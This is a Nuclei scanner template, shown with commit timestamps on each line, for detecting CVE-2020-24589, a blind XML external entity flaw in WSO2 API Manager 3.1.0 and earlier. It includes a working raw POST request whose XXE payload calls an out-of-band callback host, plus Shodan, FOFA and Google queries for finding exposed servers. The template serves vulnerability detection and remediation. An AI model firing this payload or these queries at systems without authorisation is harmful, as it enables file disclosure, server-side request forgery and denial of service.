2021-10-16 00:37:03 +00:00
id : CVE-2020-24589
info :
2022-04-15 16:39:44 +00:00
name : WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection
2021-10-16 00:37:03 +00:00
author : lethargynavigator
2021-10-21 16:55:42 +00:00
severity : critical
2023-04-12 10:55:48 +00:00
description : WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, denial of service, or server-side request forgery.
2023-09-06 12:22:36 +00:00
remediation : |
Upgrade to a patched version of WSO2 API Manager (3.1.1 or above) or apply the provided security patch.
2022-03-29 10:33:49 +00:00
reference :
- https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742
- https://nvd.nist.gov/vuln/detail/CVE-2020-24589
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/athiththan11/WSO2-CVE-Extractor
2021-10-16 00:37:03 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
cvss-score : 9.1
cve-id : CVE-2020-24589
2023-07-11 19:49:27 +00:00
cwe-id : CWE-611
2024-05-31 19:23:20 +00:00
epss-score : 0.64778
epss-percentile : 0.97891
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : wso2
product : api_manager
2024-05-31 19:23:20 +00:00
shodan-query : http.favicon.hash:1398055326
fofa-query : icon_hash=1398055326
google-query : inurl:"carbon/admin/login"
2024-01-14 09:21:50 +00:00
tags : cve2020,cve,wso2,xxe,oast,blind
2021-10-16 00:37:03 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-10-21 15:02:55 +00:00
- raw :
- |
POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
payload=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+"http%3a//{{interactsh-url}}">%25xxe%3b]>
2021-10-16 00:37:03 +00:00
matchers-condition : and
matchers :
- type : word
2021-10-21 15:02:55 +00:00
part : interactsh_protocol
2021-10-16 00:37:03 +00:00
words :
2021-10-21 16:55:42 +00:00
- "http"
- type : word
part : body
words :
- "Failed to install the generic artifact type"
2024-06-01 06:53:00 +00:00
# digest: 4a0a00473045022100a46002c04b61e32de82a96a52b9b729882e74fa21aaaea3fc4c33bac965f7897022010b04d7670233afd72f3ee1137579adc1b40f09a0b771f769deba4e19d5069e1:922c64590222798bb761d5b6d8e72950
